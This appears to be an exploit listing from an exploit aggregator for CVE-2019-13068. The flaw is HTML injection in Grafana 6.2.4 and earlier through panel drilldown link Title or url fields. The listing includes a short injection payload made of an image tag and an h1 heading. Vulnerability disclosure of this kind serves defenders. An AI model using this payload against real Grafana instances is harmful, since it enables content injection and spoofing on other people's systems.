Exploit for Grafana 6.2.4 HTML Injection CVE-2019-13068

Name: Exploit for Grafana 6.2.4 HTML Injection CVE-2019-13068
Rating: 5 (201 reviews)

2023-03-27 | CVSS 4.3

## https://sploitus.com/exploit?id=PACKETSTORM:171500
# Exploit Title: Grafana <=6.2.4 - HTML Injection  
# Date: 30-06-2019  
# Exploit Author: SimranJeet Singh  
# Vendor Homepage: https://grafana.com/  
# Software Link: https://grafana.com/grafana/download/6.2.4  
# Version: 6.2.4  
# CVE : CVE-2019-13068  
  
The uri "public/app/features/panel/panel_ctrl.ts" in Grafana before 6.2.5 allows HTML Injection in panel drilldown links (via the Title or url field)  
  
Payload used - <img src="[image_URL]"><h1>Hello</h1>  
  
Best Regards,  
  
SimranJeet